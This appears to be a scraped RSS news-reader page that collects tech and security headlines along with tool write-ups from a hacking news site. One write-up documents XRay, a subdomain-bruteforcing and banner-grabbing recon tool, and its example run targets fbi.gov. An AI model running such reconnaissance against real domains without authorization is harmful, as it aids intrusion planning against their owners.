News Reader

News Reader

RSS tabs below. Last time of page update: 2025-06-30 14:45:57 GMT+0 Click Here to refresh the page.

START

Select a tab to begin reading.

Tech RSS feeds

Below are tech sites.

Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses

Exploit Kits vs. Patch Cycles: Closing the 48-Hour Exposure Gap

The ever-evolving cybersecurity landscape now pits exploit kits against patch cycles, making time the critical…

Exploit Kits vs. Patch Cycles: Closing the 48-Hour Exposure Gap on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 25 Jun 2025 19:29:48 +0000

Comparing Enterprise Browsers: Key Features to Look For

Organizations have big problems securing their digital platforms and being productive. Choosing an enterprise browser…

Comparing Enterprise Browsers: Key Features to Look For on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Tue, 10 Jun 2025 15:29:21 +0000

Top DSPM Challenges and How to Tackle Them

Data Security Posture Management is key as you move workloads to the cloud. It helps…

Top DSPM Challenges and How to Tackle Them on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Tue, 03 Jun 2025 13:13:59 +0000

Latest news

I'm never toting ice after testing a smart cooler (and it just hit an all-time low price)

The Anker Solix EverFrost 2 is a battery-powered cooler that reliably stores perishables without ice for up to three days. Here's my buying advice.

Article link

Date of publish: Mon, 30 Jun 2025 14:43:22 GMT

Best July 4th laptop deals live now

We've wrangled the five best laptop deals from Dell, Apple, Asus, and more - just in time for Independence Day.

Article link

Date of publish: Mon, 30 Jun 2025 14:43:00 GMT

I replaced my work PC with this Dell laptop - now I'm wondering why I waited so long

The Alienware Area-51m 18 spares no expense in delivering a level of performance that few laptops can rival.

Article link

Date of publish: Mon, 30 Jun 2025 14:35:00 GMT

NYT > Technology

How Do You Teach Computer Science in the A.I. Era?

Universities across the country are scrambling to understand the implications of generative A.I.’s transformation of technology.

Article link

Date of publish: Mon, 30 Jun 2025 09:01:10 +0000

Are You Applying for Tech Jobs or Tech Internships? We Want to Hear About It.

Companies using A.I. tools to automate tasks like coding are changing job prospects for recent grads and college students. Tell us about your experiences.

Article link

Date of publish: Mon, 30 Jun 2025 09:03:10 +0000

Trump Wants America to Make iPhones. Here’s How India Is Doing It.

India is carving out a new space for Foxconn and other high-end manufacturers, just as President Trump demands American companies do at home.

Article link

Date of publish: Mon, 30 Jun 2025 12:44:07 +0000

BleepingComputer

Hikvision Canada ordered to cease operations over security risks

The Canadian government has ordered Hikvision's subsidiary in the country to cease all operations following a review that determined them to pose a national security risk. [...]

Article link

Date of publish: Mon, 30 Jun 2025 10:11:17 -0400

Microsoft warns of Windows update delays due to wrong timestamp

Microsoft has confirmed a new known issue causing delivery delays for June 2025 Windows security updates due to an incorrect metadata timestamp. [...]

Article link

Date of publish: Mon, 30 Jun 2025 09:48:49 -0400

Europol helps disrupt $540 million crypto investment fraud ring

Spanish authorities have arrested five individuals in Madrid and the Canary Islands, suspected of laundering $540 million (€460 million) from illegal cryptocurrency investment schemes and defrauding more than 5,000 victims. [...]

Article link

Date of publish: Mon, 30 Jun 2025 09:20:58 -0400

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time


"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"


Peak the languages that power the web.


With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps
  • There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC Types


Smart OSINT Collection of Common IOC (Indicator of compromise) Types


This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection

For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS
  • Collection Sources

Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks
  • Risk Scoring

The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output

Mimir offers results output in various options including local file reports or exporting the results to an external service.

stdout (console output)
normalizes result data, printed with headers and subheaders per module

JSON file
beautified output to local file

Excel
uses multiple sheets per IOC type

MISP
commit new indicators

ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time


"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".


Understand the nitty-gritty of Cybersecurity with ease


It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.

This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry leading concepts and tools
  • Acquire required skills and certifications to survive the ever changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment
  • By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Hacker News: Front Page

How urea forms spontaneously

Article URL: https://ethz.ch/en/news-and-events/eth-news/news/2025/06/how-urea-forms-spontaneously.html

Comments URL: https://news.ycombinator.com/item?id=44423812

Points: 3

# Comments: 0

Article link

Date of publish: Mon, 30 Jun 2025 14:30:42 +0000

Congress might block state AI laws for a decade
Show HN: TokenDagger – A tokenizer faster than OpenAI's Tiktoken

TokenDagger is a drop-in replacement for OpenAI’s Tiktoken (the tokenizer behind Llama 3, Mistral, GPT-3.*, etc.). It’s written in C++ 17 with thin Python bindings, keeps the exact same BPE vocab/special-token rules, and focuses on raw speed.

I’m teaching myself LLM internals by re-implementing the stack from first principles. Profiling TikToken’s Python/Rust implementation showed a lot of time was spent doing regex matching. Most of my perf gains come from a) using a faster jit-compiled regex engine; and b) simplifying the algorithm to forego regex matching special tokens at all.

Benchmarking code is included. Notable results show: - 4x faster code sample tokenization on a single thread. - 2-3x higher throughput when tested on a 1GB natural language text file.


Comments URL: https://news.ycombinator.com/item?id=44422480

Points: 72

# Comments: 15

Article link

Date of publish: Mon, 30 Jun 2025 12:33:58 +0000

Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses

Exploit Kits vs. Patch Cycles: Closing the 48-Hour Exposure Gap

The ever-evolving cybersecurity landscape now pits exploit kits against patch cycles, making time the critical…

Exploit Kits vs. Patch Cycles: Closing the 48-Hour Exposure Gap on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 25 Jun 2025 19:29:48 +0000

Comparing Enterprise Browsers: Key Features to Look For

Organizations have big problems securing their digital platforms and being productive. Choosing an enterprise browser…

Comparing Enterprise Browsers: Key Features to Look For on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Tue, 10 Jun 2025 15:29:21 +0000

Top DSPM Challenges and How to Tackle Them

Data Security Posture Management is key as you move workloads to the cloud. It helps…

Top DSPM Challenges and How to Tackle Them on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Tue, 03 Jun 2025 13:13:59 +0000

INE Security Alert: $16.6 Billion in Cyber Losses Underscore Critical Need for Advanced Security Training
INE Security and RedTeam Hacker Academy Announce Partnership to Advance Cybersecurity Skills in the Middle East
May Patch Tuesday From Microsoft Fixed 5 Zero-Days

With May Patch Tuesday updates, Microsoft addressed dozens of security vulnerabilities important for customers’ systems.…

May Patch Tuesday From Microsoft Fixed 5 Zero-Days on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Tue, 27 May 2025 10:04:47 +0000

What to look for in USA-based dedicated server solutions

If your business is scaling up and shared hosting isn’t cutting it anymore, there’s a…

What to look for in USA-based dedicated server solutions on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Tue, 27 May 2025 08:04:26 +0000

INE Security Partners with Abadnet Institute for Cybersecurity Training Programs in Saudi Arabia
Understanding Multisig Security for Enhanced Protection of Digital Assets

To boost the safeguarding of your cryptocurrencies, opt for a configuration that utilizes an N-of-M…

Understanding Multisig Security for Enhanced Protection of Digital Assets on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 21 May 2025 20:20:47 +0000

INE Security Alert: Continuous CVE Practice Closes Critical Gap Between Vulnerability Alerts and Effective Defense

Latest news

I'm never toting ice after testing a smart cooler (and it just hit an all-time low price)

The Anker Solix EverFrost 2 is a battery-powered cooler that reliably stores perishables without ice for up to three days. Here's my buying advice.

Article link

Date of publish: Mon, 30 Jun 2025 14:43:22 GMT

Best July 4th laptop deals live now

We've wrangled the five best laptop deals from Dell, Apple, Asus, and more - just in time for Independence Day.

Article link

Date of publish: Mon, 30 Jun 2025 14:43:00 GMT

I replaced my work PC with this Dell laptop - now I'm wondering why I waited so long

The Alienware Area-51m 18 spares no expense in delivering a level of performance that few laptops can rival.

Article link

Date of publish: Mon, 30 Jun 2025 14:35:00 GMT

I replaced my Pixel 9 Pro with a $280 Android phone for three weeks - and didn't regret it

With its bold design, promise of modularity, and surprisingly solid feature set, the CMF Phone 2 Pro stands out from every other affordable smartphone.

Article link

Date of publish: Mon, 30 Jun 2025 14:33:00 GMT

How to use a circuit breaker finder to understand your home's wiring (and why it matters so much)

I almost paid for new wiring - until this Klein tool showed me the power was already there.

Article link

Date of publish: Mon, 30 Jun 2025 14:31:00 GMT

AI has 2 billion users, but only 3% pay

AI has racked up a ton of users globally, but new research shows that very little money is being made by new tech that is incredible expensive to operate.

Article link

Date of publish: Mon, 30 Jun 2025 13:47:48 GMT

Microsoft unveils Windows 11 25H2 - here's who can try it now and how

Microsoft is promising a quick and easy upgrade.

Article link

Date of publish: Mon, 30 Jun 2025 13:43:29 GMT

Amazon Prime Day is July 8-11: Here's everything to know now

Prime Day returns July 8-11. Here's everything you need to know about the popular shopping event before next week -- including deals live now.

Article link

Date of publish: Mon, 30 Jun 2025 13:40:44 GMT

I replaced my Windows laptop with a 'premium' Chromebook - and can't go back

Lenovo's Chromebook Plus 14 features up to 16GB of RAM, an OLED display, and 17 hours of battery life, earning our Editor's Choice award for its versatility.

Article link

Date of publish: Mon, 30 Jun 2025 13:00:00 GMT

Are software professionals truly an endangered species? It's complicated

Here's the mindset shift you need to strengthen your job security in today's rapidly changing market.

Article link

Date of publish: Mon, 30 Jun 2025 12:56:33 GMT

The best tablets for students in 2025: Expert tested and reviewed

Our experts went hands-on with the best tablets for students from Apple, Samsung, Wacom, and more.

Article link

Date of publish: Mon, 30 Jun 2025 12:33:00 GMT

This Debian-based Linux distro is an overlooked and user-friendly gem

This operating system can serve users of all types, right out of the box.

Article link

Date of publish: Mon, 30 Jun 2025 12:31:20 GMT

How AI companies are secretly collecting training data from the web (and why it matters)

AI companies are quietly harvesting your web content. Learn how to detect their bots, block scraping attempts, and defend your work before it's used to train someone else's model

Article link

Date of publish: Mon, 30 Jun 2025 11:30:14 GMT

How proxy servers actually work, and why they're so valuable

Proxy servers don't just hide IP addresses. They manage traffic, fight malware, help gather data, and power the modern internet. Here's how they work, and why they matter more than ever.

Article link

Date of publish: Mon, 30 Jun 2025 10:00:12 GMT

How to set up Alexa to receive notifications on Prime Day deals you want

According to Amazon, over half of its customers use Alexa to help them shop.

Article link

Date of publish: Mon, 30 Jun 2025 09:07:00 GMT

I replaced my solar panels with wind power generators at home - here are the results after 6 months

Solar generators work well, until the sun goes away. This backup gadget keeps your devices running no matter the weather.

Article link

Date of publish: Mon, 30 Jun 2025 08:45:11 GMT

Should you upgrade to Wi-Fi 7? Here's my verdict after testing this next-gen router at home

The Asus RT-BE86U brings strong security and next-gen internet speeds - but is it worth the upgrade?

Article link

Date of publish: Mon, 30 Jun 2025 08:40:14 GMT

I replaced my Pixel 9 Pro with a $750 Android for a week - and didn't regret it

The Redmagic 10S Pro packs serious power and delivers an elite gaming experience - but is it good enough to replace my everyday flagship?

Article link

Date of publish: Mon, 30 Jun 2025 08:30:14 GMT

Finally, a video security doorbell that has similar features as Ring but no monthly fees

The Lorex 2K video doorbell ditches subscription fees and lets you choose between wired or wireless installation. After testing it myself, here's what I think.

Article link

Date of publish: Mon, 30 Jun 2025 08:20:15 GMT

One of the best Android smartwatches I've tested is not a Google or Samsung

Most smartwatches last a day or two between charges, but Mobvoi's TicWatch Pro 5 Enduro doubles that for a competitive $160 price.

Article link

Date of publish: Mon, 30 Jun 2025 08:00:13 GMT

NYT > Technology

How Do You Teach Computer Science in the A.I. Era?

Universities across the country are scrambling to understand the implications of generative A.I.’s transformation of technology.

Article link

Date of publish: Mon, 30 Jun 2025 09:01:10 +0000

Are You Applying for Tech Jobs or Tech Internships? We Want to Hear About It.

Companies using A.I. tools to automate tasks like coding are changing job prospects for recent grads and college students. Tell us about your experiences.

Article link

Date of publish: Mon, 30 Jun 2025 09:03:10 +0000

Trump Wants America to Make iPhones. Here’s How India Is Doing It.

India is carving out a new space for Foxconn and other high-end manufacturers, just as President Trump demands American companies do at home.

Article link

Date of publish: Mon, 30 Jun 2025 12:44:07 +0000

Mark Zuckerberg and Priscilla Chan Narrow CZI’s Focus to Science Efforts

The tech titan and his wife once had sprawling ambitions for their Chan Zuckerberg Initiative. Now their efforts in politics, education and housing have been cut back to focus on science.

Article link

Date of publish: Sat, 28 Jun 2025 09:00:43 +0000

Interesting

A reporter who writes about A.I. finds her work is catching on — with the Chatbot she often writes about.

Article link

Date of publish: Sun, 29 Jun 2025 07:00:18 +0000

At Bezos’ Venetian Wedding: Buzz, Bling and Backlash

The over-the-top party in the photogenic Italian city mixed Hollywood, Silicon Valley and political overtones.

Article link

Date of publish: Sat, 28 Jun 2025 16:58:21 +0000

:( Microsoft’s ‘Blue Screen of Death’ Is Going Away

The blue screen that stressed computer users for more than three decades is giving way to a black one.

Article link

Date of publish: Fri, 27 Jun 2025 20:42:37 +0000

Hard Fork Live, Part 1: Sam Altman and Brad Lightcap of OpenAI

Highlights from our first live taping, and our reaction to a spicy interview with OpenAI leaders.

Article link

Date of publish: Fri, 27 Jun 2025 11:00:07 +0000

Authorities Rescue Girl Whose Mother Livestreamed Her Sexual Abuse

The 9-year-old from Vietnam was abused by her mother for customers watching on smartphone apps in the U.S. and elsewhere. The mother said she needed the money.

Article link

Date of publish: Fri, 27 Jun 2025 21:18:11 +0000

A.I. Frenzy Escalates as OpenAI, Amazon and Meta Supersize Spending

Companies like OpenAI, Amazon and Meta have supersized their spending on artificial intelligence, with no signs of slowing down.

Article link

Date of publish: Fri, 27 Jun 2025 09:01:27 +0000

Mark Zuckerberg Ramps Up Meta’s A.I. Spending as Competition Heats Up

Unhappy with his company’s artificial intelligence efforts, Meta’s C.E.O. is on a spending spree as he reconsiders his strategy in the contest to invent a hypothetical “superintelligence.”

Article link

Date of publish: Fri, 27 Jun 2025 15:05:41 +0000

Uber in Talks With Travis Kalanick to Fund Self-Driving Car Deal

The ride-hailing company is in talks to help Mr. Kalanick, who was forced out in 2017, buy an autonomous vehicles start-up as the robot taxi service Waymo gains momentum.

Article link

Date of publish: Thu, 26 Jun 2025 21:26:01 +0000

Tanner Martin Announces His Own Death

Tanner Martin has documented his fight against colon cancer for hundreds of thousands of followers. His death was announced in a recorded video.

Article link

Date of publish: Fri, 27 Jun 2025 14:29:03 +0000

A.I. Is Starting to Wear Down Democracy

Content generated by artificial intelligence has become a factor in elections around the world. Most of it is bad, misleading voters and discrediting the democratic process.

Article link

Date of publish: Fri, 27 Jun 2025 14:33:14 +0000

Why Does Every Commercial for A.I. Think You’re a Moron?

Ads for consumer A.I. are struggling to imagine how the product could improve your day — unless you’re a barely functioning idiot.

Article link

Date of publish: Wed, 25 Jun 2025 09:01:09 +0000

Takeaways From Hard Fork’s Interview With OpenAI’s Sam Altman

Mr. Altman discussed President Trump’s understanding of artificial intelligence, the war for A.I. talent and OpenAI’s relationship with Microsoft.

Article link

Date of publish: Thu, 26 Jun 2025 14:34:49 +0000

Four Astronauts Lift Off on Axiom Mission to the I.S.S.

Sponsored by governments but ferried by a private company, astronauts from Hungary, India and Poland are going to the space station for the first time.

Article link

Date of publish: Wed, 25 Jun 2025 08:11:18 +0000

At Amazon’s Biggest Data Center, Everything Is Supersized for A.I.

On 1,200 acres of cornfield in Indiana, Amazon is building one of the largest computers ever for work with Anthropic, an artificial intelligence start-up.

Article link

Date of publish: Tue, 24 Jun 2025 17:09:36 +0000

On Broadway, A.I. and High-Tech Storytelling Is Having a Moment

Videos and projections depicting an A.I.-generated actor, the digital memories of robots, a redwood forest and more: High-tech storytelling is having a moment.

Article link

Date of publish: Tue, 24 Jun 2025 09:00:09 +0000

Ford Will Keep Battery Factory Even if Republicans Ax Tax Break

Ford Motor said it would open a new plant in Michigan that could become ineligible for federal incentives under a policy bill championed by President Trump and passed by the House.

Article link

Date of publish: Thu, 26 Jun 2025 19:58:05 +0000

Media Matters Sues F.T.C. Over Advertising Investigation

The liberal advocacy organization said in a lawsuit that the Federal Trade Commission’s inquiry into boycotts with other advertising groups was “retribution.”

Article link

Date of publish: Mon, 23 Jun 2025 19:48:45 +0000

BleepingComputer

Hikvision Canada ordered to cease operations over security risks

The Canadian government has ordered Hikvision's subsidiary in the country to cease all operations following a review that determined them to pose a national security risk. [...]

Article link

Date of publish: Mon, 30 Jun 2025 10:11:17 -0400

Microsoft warns of Windows update delays due to wrong timestamp

Microsoft has confirmed a new known issue causing delivery delays for June 2025 Windows security updates due to an incorrect metadata timestamp. [...]

Article link

Date of publish: Mon, 30 Jun 2025 09:48:49 -0400

Europol helps disrupt $540 million crypto investment fraud ring

Spanish authorities have arrested five individuals in Madrid and the Canary Islands, suspected of laundering $540 million (€460 million) from illegal cryptocurrency investment schemes and defrauding more than 5,000 victims. [...]

Article link

Date of publish: Mon, 30 Jun 2025 09:20:58 -0400

FBI: Cybercriminals steal health data posing as fraud investigators

The Federal Bureau of Investigation (FBI) has warned Americans of cybercriminals impersonating health fraud investigators to steal their sensitive information. [...]

Article link

Date of publish: Mon, 30 Jun 2025 08:42:01 -0400

Over 1,200 Citrix servers unpatched against critical auth bypass flaw

Over 1,200 Citrix NetScaler ADC and NetScaler Gateway appliances exposed online are unpatched against a critical vulnerability believed to be actively exploited, allowing threat actors to bypass authentication by hijacking user sessions. [...]

Article link

Date of publish: Mon, 30 Jun 2025 07:47:38 -0400

Google rolls out Veo 3 video generator, try it for free using credits

Google is rolling out Veo 3 to everyone using Vertex AI, which is an ML-testing platform provided by Google Cloud. [...]

Article link

Date of publish: Sun, 29 Jun 2025 19:38:30 -0400

Bluetooth flaws could let hackers spy through your microphone

Vulnerabilities affecting a Bluetooth chipset present in more than two dozen audio devices from ten vendors can be exploited for eavesdropping or stealing sensitive information. [...]

Article link

Date of publish: Sun, 29 Jun 2025 12:03:19 -0400

Cloudflare open-sources Orange Meets with End-to-End encryption

Cloudflare has implemented end-to-end encryption (E2EE) to its video calling app Orange Meets and open-sourced the solution for transparency. [...]

Article link

Date of publish: Sun, 29 Jun 2025 10:11:21 -0400

Let’s Encrypt ends certificate expiry emails to cut costs, boost privacy

Let's Encrypt has announced it will no longer notify users about imminent certificate expirations via email due to high costs, privacy concerns, and unnecessary complexities. [...]

Article link

Date of publish: Sat, 28 Jun 2025 10:09:19 -0400

Scattered Spider hackers shift focus to aviation, transportation firms

Hackers associated with Scattered Spider tactics have expanded their targeting to the aviation and transportation industries after previously attacking insurance and retail sectors [...]

Article link

Date of publish: Fri, 27 Jun 2025 14:20:58 -0400

Russia’s throttling of Cloudflare makes sites inaccessible

Starting June 9, 2025, Russian internet service providers (ISPs) have begun throttling access to websites and services protected by Cloudflare, an American internet giant. [...]

Article link

Date of publish: Fri, 27 Jun 2025 11:47:15 -0400

Citrix Bleed 2 flaw now believed to be exploited in attacks

A critical NetScaler ADC and Gateway vulnerability dubbed "Citrix Bleed 2" (CVE-2025-5777) is now likely exploited in attacks, according to cybersecurity firm ReliaQuest, seeing an increase in suspicious sessions on Citrix devices. [...]

Article link

Date of publish: Fri, 27 Jun 2025 10:18:09 -0400

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time


"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"


Peak the languages that power the web.


With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps
  • There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC Types


Smart OSINT Collection of Common IOC (Indicator of compromise) Types


This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection

For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS
  • Collection Sources

Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks
  • Risk Scoring

The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output

Mimir offers results output in various options including local file reports or exporting the results to an external service.

stdout (console output)
normalizes result data, printed with headers and subheaders per module

JSON file
beautified output to local file

Excel
uses multiple sheets per IOC type

MISP
commit new indicators

ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time


"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".


Understand the nitty-gritty of Cybersecurity with ease


It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.

This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry leading concepts and tools
  • Acquire required skills and certifications to survive the ever changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment
  • By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Best Practices For Protecting Against Phishing, Ransomware and Email Fraud


"Best Practices for Protecting Against Phishing, Ransomware and Email Fraud"


Osterman Research conducted a survey among corporate decisions makers in early 2018 and found that nearly 28% of those organizations had experienced a phishing attack that was successful in infecting their networks with malware.

Over 17% of organizations had email as part of a CEO Fraud/BEC attack that successfully tricked one or more of their senior executives in the last 12 months. Don’t let this happen to your organization.

Download the Osterman Research Whitepaper, Best Practices for Protecting Against Phishing, Ransomware and Email Fraud, and learn ten best practices you should consider to better protect your systems and network, train your users to be security-aware, and safeguard your organization’s sensitive and confidential data from phishing attacks, ransomware, and CEO Fraud.

Article link

Date of publish: Mon, 25 Nov 2019 07:46:00 +0000

XRay - Using For Recon Mapping And OSINT Suite


XRay is a software for recon, mapping and OSINT gathering from public networks.

XRay for network OSINT gathering, its goal is to make some of the initial tasks of information gathering and network mapping automatic.

How Does it Work?

XRay is a very simple tool, it works this way:
  1. It'll bruteforce subdomains using a wordlist and DNS requests.
  2. For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.
  3. If a ViewDNS API key is provided, for every subdomain historical data will be collected.
  4. For every unique IP address, and for every open port, it'll launch specific banner grabbers and info collectors.
  5. Eventually the data is presented to the user on the web ui.

Grabbers and Collectors

  • HTTP Server, X-Powered-By and Location headers.
  • HTTP and HTTPS robots.txt disallowed entries.
  • HTTPS certificates chain ( with recursive subdomain grabbing from CN and Alt Names ).
  • HTML title tag.
  • DNS version.bind. and hostname.bind. records.
  • MySQL, SMTP, FTP, SSH, POP and IRC banners.

Notes

Shodan API Key

The shodan.io API key parameter ( -shodan-key KEY ) is optional, however if not specified, no service fingerprinting will be performed and a lot less information will be shown (basically it just gonna be DNS subdomain enumeration).

ViewDNS API Key

If a ViewDNS API key parameter ( -viewdns-key KEY ) is passed, domain historical data will also be retrieved.

Anonymity and Legal Issues

The software will rely on your main DNS resolver in order to enumerate subdomains, also, several connections might be directly established from your host to the computers of the network you're scanning in order to grab banners from open ports. Technically, you're just connecting to public addresses with open ports (and there's no port scanning involved, as such information is grabbed indirectly using Shodan API), but you know, someone might not like such behaviour.

Building a Docker image

To build a Docker image with the latest version of XRay:

git clone https://github.com/evilsocket/xray.git
cd xray
docker build -t xraydocker .

Once built, XRay can be started within a Docker container using the following:

docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com 

Manual Compilation

Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH.

Then:

go get github.com/evilsocket/xray
cd $GOPATH/src/github.com/evilsocket/xray/
make

You'll find the executable in the build folder.

Usage

Usage: xray -shodan-key YOUR_SHODAN_API_KEY -domain TARGET_DOMAIN

Options:
  -address string
        IP address to bind the web ui server to. (default "127.0.0.1")
  -consumers int
        Number of concurrent consumers to use for subdomain enumeration. (default 16)
  -domain string
        Base domain to start enumeration from.
  -port int
        TCP port to bind the web ui server to. (default 8080)
  -preserve-domain
        Do not remove subdomain from the provided domain name.
  -session string
        Session file name. (default "<domain-name>-xray-session.json")
  -shodan-key string
        Shodan API key.
  -viewdns-key string
        ViewDNS API key.
  -wordlist string
        Wordlist file to use for enumeration. (default "wordlists/default.lst")

Example:

# xray -shodan-key yadayadayadapicaboo... -viewdns-key foobarsomethingsomething... -domain fbi.gov

____  ___
\   \/  /
 \     RAY v 1.0.0b
 /    by Simone 'evilsocket' Margaritelli
/___/\  \
      \_/

@ Saving session to fbi.gov-xray-session.json
@ Web UI running on http://127.0.0.1:8080/

Download XRay

Article link

Date of publish: Mon, 11 Nov 2019 09:53:00 +0000

Hacking for Dummies, 6th Edition ($29.99 Value) Free


"Hacking for Dummies, 6th Edition ($29.99 Value) Free for a Limited Time"

Stop hackers before they hack you!


In order to outsmart a would-be hacker, you need to get into the hacker’s mindset and with this book, thinking like a bad guy has never been easier. Get expert knowledge on penetration testing, vulnerability assessments, security best practices, and ethical hacking that is essential in order to stop a hacker in their tracks.

This no-nonsense book helps you learn how to recognize the vulnerabilities in your systems so you can safeguard them more diligently—with confidence and ease.
  • Get up to speed on Windows 10 hacks  
  • Learn about the latest mobile computing hacks
  • Get free testing tools   
  • Find out about new system updates and improvements
